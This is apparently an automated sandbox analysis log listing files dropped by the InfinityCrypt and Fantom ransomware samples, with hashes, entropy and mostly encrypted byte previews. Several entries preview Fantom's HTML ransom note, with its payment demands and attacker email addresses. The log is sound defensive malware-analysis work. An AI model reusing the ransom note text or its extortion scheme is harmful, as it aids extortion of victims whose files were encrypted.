                                                                                                        Preview:.6~..zm....O..i>..]...)..N.3.X...L../.7g.-.i...c.V...C..%s....S......A,%%L...S%`..I/.6.V.y..<..O..E-..c0.....\L.#.J.`j.....g...Kq.(..#...rA.8..:...*/...)k...qA.I....\v..%.xk.$..-.#H|t.,~..y........Y7H...OG...e..z.o.T..R.<.g.n.........s..f..C..t..F.P.A.;.\.k....:..^y.&W..G.9.S:........:FlLu..^.Cq.E..1.!g..#....j...{."{w.:)..0Ct....*.OO...21.....s....i..!.P......~P^."`.`.........R.sb.-..m.!&F....F.)..X...kf.u....dE..q..me5.....FF....b./...O...;.\V.5lvQ>..G.9R.jr.b.~.......[.!..a...NeJ.....bSC.g...v.o.....9...5.=..O..h.ZN.r.*....4.O...]...k$'.W\...W.Cnc. .eF..kP.5'..:..3......C..K.}...O.;.za..b..]q:.\...grB.<.).T..SuP4....P7O8.S~....Q..uP.u..^...a|.^..).1..m....^...L..5...pl..4&n.X.......,..(`......Q.m..=.:B..cQ..*%b PB..P^:M5...+-...Fm...HB....g.%.5.....Y.........]....V.{....Iw...a_qb1.@...zf.6p....4..kuzi.nj.Q....HP.0r....U....5...840V.F:..i.%....(..>M..f...M.6..ME..y..<|..&}.^66.w.p.]*0B....'M..Y.J.l..Wz&..U...g....X...m.~;z..Q..].?.|..a.w..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1920
                                                                                                        Entropy (8bit):7.9116225628424806
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:w+2YNkIbe2GN4jlRScFxTSkBz+ASUnHVwjNuY7p67STHqj:w+2YviGTScFxThBqASIHVwhl6qHW
                                                                                                        MD5:34D0560F22C35659D28B7AA7C5C41AB3
                                                                                                        SHA1:6C667B77A9FD16ABE4C647B4FE8E65D2752DDDD7
                                                                                                        SHA-256:C384EA92E572FBC14B3E677A15F9F2D3D871858ADF998981329E82BA47EF5FF9
                                                                                                        SHA-512:BDFA270AB83CE40843F5C3066E36C47AD9AF3208CE5F359B1E0385C5D1EDFE69F57C151934D94C5EEFCDCA06A763C31D69C2E40200E493C7E7BF3DB3C4AAEDB2
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:#...I.#.4f...Z.^..&...qK.....0..g..{../sz...F.[T..0........'O+V..k...(I.ww...t......d.!.=`.=.(...tO"....H..D].s..O?.B_$.,.5.c...9.......e...Oj_|O.%n1....4..{.....b.C:}.STx...=D$..}.+-/.O...>..:.:SS....,..w..R......KA.'..).o.A.t2.H.vY.n.o'.".];T1..W.4..3..-.S..]...N{...`.d|......&./....k...... .......B,.mkO.a...k.K..r.......Nw....B6......!...H...(..H.......c.E.......D..a..q.&....`....U.+..#.Y....S.K.`.c7...@..C...k-..O.tG..cA'...nn~.P^.2..>U.9dC....Y[C..y.Q....I.o...q*....~2_.b5.<.....I9l..#..S.Bc..P....%....3............F..b..*.....Wj..h@!g..r.b..k5E..l.9g...H...Or...V3.c/....n...:..*j..=.0Q..."!.. ...<.4U.b.vdzJs..=..B...6.C....4O..| o~M.U... c.q..A.}#.t>@c.*\...DH..O4......7I.q.._...*.....f.\9.G..PN..N.}.;.Rd...gM..K....._..k{...e.....&.j...B...72.....~.g'..h.^........?...ew.L.{C.cJ7..-].:U..U...._D._..y0G..X...9NH..o. r....935WQ...`9>.#.....1.,..pp.....p..4....m..iA.>./3..v1&....Km..F..rA?...4.."...zl .y2%....o...=I..e.s..V..*.C...A.7.3..LA..a.3.).
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):761296
                                                                                                        Entropy (8bit):7.9997704619784145
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:12288:azSOU9dTesVVCxwY3e5gsjzOIfc1WhrVe3hgwpWcrpaB3prQ9lqv5hNTwBjsQ/hK:aVUDx/CJ3zsj1r2fp94B3p6lk5LTCoUK
                                                                                                        MD5:0F425DA1A87C39B54C29FC3355D707B8
                                                                                                        SHA1:EA0C394C5958F4CFAB541FD03E6A63DEEE1DE50A
                                                                                                        SHA-256:251698B75A2EF63A75129F63BD19CCFA98559A50855F6A4A5D9E15B9F7408234
                                                                                                        SHA-512:4C89201E993415477F94AB24ADDA7EB3207FF3884051F36506FD33E6ABE68504FD73146BB9496C44938E456F7CF9EAE6813F990D6502D18366A43BD1DBAA4C36
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.n.0..;g.v#F..4.@s.....b .M.....cIv......,.._.*..cW.Z.i.....6...?N.\..G?E.R....)D..'V-.L..;...&-......Y...f%!a[7!.XK..\....e..Dq...i...G...D<k...."..._.....0[0Z..fw.}......#.[....8...f...0z....!N...O3].._;..4E....4l.J...'..W.$.,.<.9m[.V..C..A...H..=!3=..s'.t:..1=....@_$...I=e..e.L.r...s.R..R.jy' Z+...'.D.......R..Q.4*....;tmf{.....Zk..U..kg....u?.-.Jk....GMe^w...0..".<`.Z..m.......1..y.D.Q..Y...k=&..($....@)q.bm.....0U..9...A..O...._......=..P.\...\.'....`B#.....0.W..7.......;.B..."'.*8..:.$x...;X........i..\...x.....d8.1.Ic.>...E5...C..z...\..../.l...SB.....;c,0V..u..a5..`...ZqI1....t..h...G.iO..]....O/9.L9.c~B.)P...9p1'......E...+....p..B...<..7z.E....... ..N4.TiN.&.[!.`4..)l./N.\.~ku..s...9?...R..5V....(...%R..... .m...L.Y..W.a._O..6F..aO.>....t("......J!2.j.4,7Y".(8........w....*"....k.6......`.L......;.-K? ...H..2.l..}jr.m'...0z...+.#.e.c#(.)+b..(...`......Q3{.j.5....i.UH8...<|...7...7{.2.`.z.|....."N.z.(.V....`...j+C..(...T.,.GNT$..Q".''.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):279936
                                                                                                        Entropy (8bit):7.999289568662434
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:6144:GeWCDpn+a6oFYrB8XUPYv5DId/Y/Ga1/cKBenEVeX:PnJ/oWhv5DieGgjBq9X
                                                                                                        MD5:D835D67F9B29E506A03E46C37215B54A
                                                                                                        SHA1:88F744CEA1BED2095DDF3B434AA8B5C5445CDA29
                                                                                                        SHA-256:FBC5DAB705EFF0AD7E9B3A7695DF680A98D3731C62EC4C2EC0666B07B6841BCF
                                                                                                        SHA-512:A63A8CE39FB80C9F59CC56E958A3551C1B4CA9B7A65AE6CC669A610C094EB1C6F5EE8F3254318CD18C5E7B544E70847630327AC1F748B7818557EB4CBE70B4B4
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:.X{K...J.W]...l.}.#.z"i.......m.Q..@.Z...$\..".6..R.A.......F..z.......#.........w^..R..A..w.#=........"[...}._.....Vz.@.E....B`.6...,.....o.[..$.#e8..4.....wi.:=..+M.H.....stq.nZ0Oc...zd ....G..F...\cs.4......!......}@.f.....*.....J..1.?_.x._../a.^B.F.7.n@.FQts..AU..FN..a.>vCi5Zn.*2i..:..n...."......(..x...\...F.f..k...%J.F....W}...SR...T.8.<...T....[.......~....%.:.....VDZW......r.p.Tu.&r..P/.>.K.)xOOH. c.1.l........3?q....}...)...).U....K.Pe..ZA#....>......#..).X...+......RJ..l.V.H.x*C..mnQ.w...k............`...U..`.=[.Z.....A.F]..a..t&....I.8.5.-eh$....o.F......A_.?.sp3.jr6.N..!}......Kd@.xKy.....O..............8..%RI.6?!........q&.:....".....2....n.....v.Q......)...OuH.*.k9.._...(..P..z........E...9i.m\l...........y....`3..#..m.]R:"y..>W....U....H.V.<.D&.f..O.].....k...|.....t.'....-..1.|...X....EH.._O.1/...n...L.A.H..3P....91fH[.D...kH..W.......x.../L.Wc?[`.....h.T.PQ.x.N..2.W2..[...#.....Q.-&VV....4..C.5u.....j..Q.....!....z...g.6....q
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5376
                                                                                                        Entropy (8bit):7.967774277293581
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:ADPIVMlzxxhK0tTOh1UYwuS4o5LRw/IINTLQb0AxzqFC9AQBo/RtUD/grvwFTjiW:azbzBuS4oLlQA7qFC9AQBE/0grvQj
                                                                                                        MD5:2DDB0EB95E598B66591E57F9E77A0C82
                                                                                                        SHA1:6076A10AFEF6381E1CE85E932BBDFBE7A87AC773
                                                                                                        SHA-256:83CF396A72C07AF6645E94EBF4A97B933C9E16C117C379B3168601B1D5CA86DE
                                                                                                        SHA-512:BDB6545AD5B41DF6F4C5EB82EA8554FDD02941CF68A8B46AF35017DD9B849FC4D0DF91EA92ED6DF9BABFB300E0F6A7CA79A1D3D8A2F6D6A4A5AA3048AF9EF59B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:...(4e.Z.5.S0\......". ...>(...,S.mg..I.9...n'....V.K;2...^.(Z.....'.Y*..=`V....#V.....T...&^=Q......3.!....x.0Y...Q%5.'..A1.F.R..N.|.Z..k|..........b3..T....Z.P...........y.....kCJ...=....a....Q.VJ{.)d...v.2c....p7..g.TN...9..#h.'..;..O.-..+X.M.j...{.%......C.{......U.N.M./Y|..$......1..2..5..8.y.M.sv..[..7.d....f\...69..~afOY.w.M.iHP..W......e!o.m.]....Ms.O.f"...q.i.....s/..r`p.....q....R.;.9{.B.....#jF.!S..F_.`.........9I].....!).Up.~?...~....)H]c.....{~f...>.K.mzPaK.Zq.(..i ....2.:..F..B..fy .3.r.'6.T...1..P6/b.X..=<m&..?.[2.-..&g5.c..l...G.=..}'/t..h\D..u..}..4..F....?.g..u..e.7d..o!}y...N.i...c$...W2..A"X.8......M.c.R...t....lg..yu\..l....!...@X..Yv.~..C0U...x.d^._.6.j...!$(L...k.......L\..e.k...k..9J.o.&......O..D_.z.E$............k.....M=V.......m.l++..H.tB4p,V.U.P......7..-..U...%.Q..l..`.o)..O...".......L.6.....L$T. .`...o.4vX.(.K......WmV..MTh.#.)..b@...Pf/..7.........../~.~..g`.S.....1.;.Kmq5\......L...M...../..ci.c..Dl5..-)+hk.m..E.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3088
                                                                                                        Entropy (8bit):7.93274917609982
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:nLqoAirMml9Y67uGfazMUclxMDAZsnRg2:LQir5lRrYM/xkA2nRh
                                                                                                        MD5:FF3D469FB307F36A8F1E3862C8D0B5DD
                                                                                                        SHA1:511CBB13D2D900A5DB9DAD86CCB47456D9C7848D
                                                                                                        SHA-256:E5429724F8BBD4315A3C26E2FD94A89643F28B14A40AA5A2C73505A09C1076A9
                                                                                                        SHA-512:EBCA605AD11509CF0D58C3965C595E69B050813ACE7413B1B6FC8219F52D9FB03288399484E4ECF507EFB2E603E26AF1E7C6E04F0BFAD8183C5F31746DB8757A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..UK.1}...!..J...)r...-.@...I.B......H...\^3.....^..h..*.G.b.n.t...V.....l.`#......L9#,,..v.n;.y.Q2:..y`a{G..>.te....F-..N.W[.#.w......(.W.d...(.s#..s1.`......L.........._t.........u...L.g...%..K..S.K.;ux.A...s.....&..@%....L2.i..h......D..@..N..-.a.^....yV.P...%e.C...75.H........5 ...^..^HQ.\..U..S..::.D..T..k..':A...\.#O./... .p.D.k.l5y...P-...$I..q..z....}b.;..}........d..*..j....J.|^..A...<a......4-Mo.......Z..3...._U..\..E....?.=...Lu.j\u5..f.+.#..s.fGm=..nA...C....F+.8OZd..L....;.%Mn8h..s...S)....x#b.^..a.8..Wi..q..3.2..@&zSo;/\.o..[w1..=.L..x...P.?.<.....y..JO....^.,......O{.....}Dp%..tY.c.7<<...Tw.........?R::"}iA..>9....-..././T-........b.R......)mV.+D......tY.<........g.KE/ ...V.........fj....wYZ2..c..Y..=.C.t..D....?T...h.5d_D....8.hs.X1....9....U...<.....^`..d...DM+.+....7.....@q-L.(...Xa.....w0..~t9.pH,.8.yl...q..W-.cIFX.W..t.eV5...t..z..m.Wu.`..vO..t......F.S...h.J..,u...D.2.v..A#[.n=uP..gr..S......r...Z5.......3
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):77904
                                                                                                        Entropy (8bit):7.997387854639705
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:bPaQI6HuwUsgKXbJP1zQyy7MxM0Rrc1uvLFfiIRrablgdPKiRL2:bPap6HuV8JPlQNgaIVx2
                                                                                                        MD5:0AF9F53516282931B4222730D48EBAED
                                                                                                        SHA1:6EA4EC97F8B2D764A75E042EDC36D85EE9FE2092
                                                                                                        SHA-256:30DEEC5DC1713E9BC5BE78A3DF44689F443F657407819DB67B50B819A4EEB4C3
                                                                                                        SHA-512:CDDA2DF9ECB6AE95F17EF4380ABDE74D757656D42F6E03C1662F9D19DCDD46C035BF1DEF377E87961E2FACDFA9050FF687E2E799350167AC6A219C54F24C2DF4
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:3........w1...KO.1....wf.#N..8".$.=..P..6@.....H..F.v.'L,....i!.N#.[N....7v..bL...5_%.XK%.m..E..ypy..L.Kc.z....}X.#2h.....>,Ou.C-.vfe.:.VA....E,.9.?...C.....K..0G..i.+..X.+*3...._...........|.c.yW.b.pICl....O..#...tp."e....x2!.,..G.K.....a.j.4C.....a./T.Z...]\!..Q.V9.J..V..[7lfY;.Y.....]^..e.,E..5.;NS6..X.-....G"b....../[I...v1k...P&-.+\..yV.f..V..V...E.."U'.-#K..q...i....?.7...i...]....T.xz.(CX..|.Yg.0...Q..5..C..J..6...#...Q..@.'+q.m...u....n..z.Iy.".1.I.d..y..u7....?....#....7....h........{..?.,...Mz"|g..9,ns.oh".%..E ..$P^z..a_u...... !.......u.=~...6..o.Z.LQ.....b..q.....Y..8.O.e.4D..6a..`H.t..b...,.K.....l7.}....N.D._...Y.[@U)...........>|0.Z......-..z%IG..F](.*.B....m=.b..4.Z..sFU3..kA.w..^m..*..7..IM..6.5T..y...L..>..:.4...G.5..I.cg.9|..b.82....._....g:.<..yh(@..K....,'Q..#.....q........S.g....... H..e.Z..w..^&J(M.K...)...^.(........7G..8......."....0.{.-.K_.@..t<=.vA...x.F..:...=.`...X...\KyNH?C......C.#..6PF...i.~.N.L..K..X.XX
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16
                                                                                                        Entropy (8bit):3.875
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Qb7DCx:e7Dy
                                                                                                        MD5:2C684533BC47F13EE1A79DB2A421386D
                                                                                                        SHA1:7357D5A912F6879C9AF2226F1F52BDDA1C56F701
                                                                                                        SHA-256:51915A8281EAC596B70FB7920F9EEB89CCCE7F6E9FFAC436221EFB0D9445F035
                                                                                                        SHA-512:EF122A1DFD2F3A6B83D210FA280771B559B2360E0A85FA6310C9F425EF7425E39CD8C73430D08D44CA9E781157BF193E6F75286CE85859155B531EA99A16CF34
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:../.M.8"..".....
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:ISO-8859 text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16
                                                                                                        Entropy (8bit):3.875
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:+kJSL:NJW
                                                                                                        MD5:F0736877E395BDDACD14E5894665089B
                                                                                                        SHA1:EED8AC6BC799DFB2DCA9CF3D3839E67DCBEEF1A4
                                                                                                        SHA-256:9567DC1A0639480F82AD390DB750D3D329C524B74779A24090340F38C4CD2903
                                                                                                        SHA-512:20958D61DA07089B16E461DAD8CEADD3CB54F7BCF648C73347C747E7B6BB430329A43BEBB9A93F56502A6859DC41A1486D369B2D5EB4B65088E9EB0181A48F73
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i..{.._?.lW.A.c.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7232
                                                                                                        Entropy (8bit):7.97634691734075
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:DDTo++SBY7RfweaGorkd/8rrKHH7SChDZ3CshXqFxMIZm:Do++SBqZw/GoAdeoJDZ3CshExPm
                                                                                                        MD5:9FFDAEACAA42CF5DBDD17C04399385AB
                                                                                                        SHA1:C7D4A36EEFCB524A0AB378D20AADBC4AA9E07266
                                                                                                        SHA-256:E879BB538C291DB077F832CAE6FD7E0AFC0A88130D7C95E3F15F6E2105C3BEDB
                                                                                                        SHA-512:258736DA64D8DD87D58FA58820F0B7956470AD1DF299EB0929DB5FF6390D99BC5AB359C4161FB8A8886A49CD925CCD7D8881BE2272F7F5FA8A0D6EF65C61EBB8
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i.YC..:..2.&o.x(y#.S......J......i.~f.>.DMm....".{?>...t.P.1.,.9.......b.l.EqbF.......z...Y).......Z..3..W....l....(E.... ..Q^....G.(@...S.{XR..H....4..^..8...%.o...7[o.8...z.%y.f0..8...7U.Y...~.4...p...X.9.w....".s 3.0..0.t.'[.,5.G. .|...=.z.A..K.|..s".......LO.)tP<6T.bO.;..1....3u,L. .i,.h\.r..i,bl/g.cn....."/..+j.9...L .^1..N.3k7#.wa..fvV;\{.hX....J....?..1..C.$.. 3hb..0....=.T.c.}../<.........A.x....E.3xWP.x....l.....*f....P.'.j........1m~..+k.:.{8Y....~.Y$..|<=.]....r;3r.Xp.......T....c.g.....O.X........)k..y_...%8rY........BL.7..u9O..^<A.m.N.1.c...Z....*>...A.g.e..>.='......X..bn.N.g..x......v........._.=.&..8.^4..I,3x.bT..D..(.})....29.US.N.[.....(.L...:o.$.Y4.o.......z..:.F..r..6..[.'....7...rh%f.XW.T-...fFR_.n...M....d...".5.....&I..A..,<..uJ.Q./#W\....z...@...!../...X..][...,.k....b...P...I......s..w...2....\.|..............QM S6.....{;i-...&...x.).N. .bX....c...L.2.i..R..;#.j.K.s.qb......:.<..!(.I..|,...j.\........X....$a.+1e
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):400
                                                                                                        Entropy (8bit):7.474343338372292
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:rvWSnWZuXft5CGGXOdJ+AFV/d6y02c21nj8zAfqM:bXWKc1edrFTHQs
                                                                                                        MD5:EFA3919F8A544C905AA6124B54053207
                                                                                                        SHA1:FD059E64350512CB9B148C6960E6C27F3E2BFF73
                                                                                                        SHA-256:8BE60FF95768EE5515C9099A8635BB45910579FED7CF7B433F9D03D3DD4AB39C
                                                                                                        SHA-512:4355F8B57DB043390FD26A1FF9FE60FBCC2F3E12DF8C99BA9407053CDB463884B185589C89D1E20696949A62DAD30902E261EEFE09096A274A0820E1F7B365E5
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i.YC..:..2.&o.x(y#.S......J....].((....yE...........(....V."<,..}.....f......#.....GdkZ...b.xJ.....#}...{D....'....3...|e.....a..L8%..P.D9..Jl$..."G<.)[.d.L.d:....'o .DG..A@..i`.6.v..>..$. ...l..STin..WSs7).y.......R..l.c?..r..f..Q:...X...Ny..I...AX.8..u.F :p..R.sP.03..?;.'.z.....d..._V.O.T.e..&ND.|....R^..C.Q....tj.>V3...sxS2....|1....I...h.....,f..hv.......T..4...T+G
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):544
                                                                                                        Entropy (8bit):7.638556025387948
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:rvWSnWZuXft5CGGXOdJczneF1pToWxbVbeI2NjHgCqKuYN:bXWKc1edyznQ1BDXbAN9vN
                                                                                                        MD5:85D02832D026FCE3F6ED8A3F81FEAF0C
                                                                                                        SHA1:A937D6E5D3359EBFC1F2EB2C581EC302B00EA97E
                                                                                                        SHA-256:05EEBCF3AA319AC36984FEFFE478B61634926C8ABDA57445B50688DDF5980A3F
                                                                                                        SHA-512:867749B08814E453B6F116D31DE242ACCC2DE8FB066E97FD0CE41D8B5F7B190E040ECE42A516142ACB6FD2C67B4E38A75D266BAE1CD2CC0EDD8A919B74C64C37
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:i.YC..:..2.&o.x(y#.S......J....].((....yE...........(....V."<,..}.....f......#.....GdkZ...b.xJ.....#}...{D....'....3...|e.....a..L8%..P.D9..Jl$..."G<.)[.d.L.d:....'o .lj.mN.,.w...4.A2h.).Z8n.\...g...!.3.h...........}.rQ.o.&.L...6.=..?...0.L./...oy.4.%&0.."P.;.(H~..1$^Z.y*.%6.a......6.r.......F.^2@......t.9.Q:......+..s.-.)3..X..<.T.<....%..-z...(.?I0O...H...f.x.QI...0V>.T..)..X..*M.aa....`.}.SY..L.}.1.o...i.Q..2*Yw.t....:;...e...fN]..`...D.O.7...@n....65..J.Q...X.d.=<....9.~...x...<%ciq....i...a\....nVp......Q
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
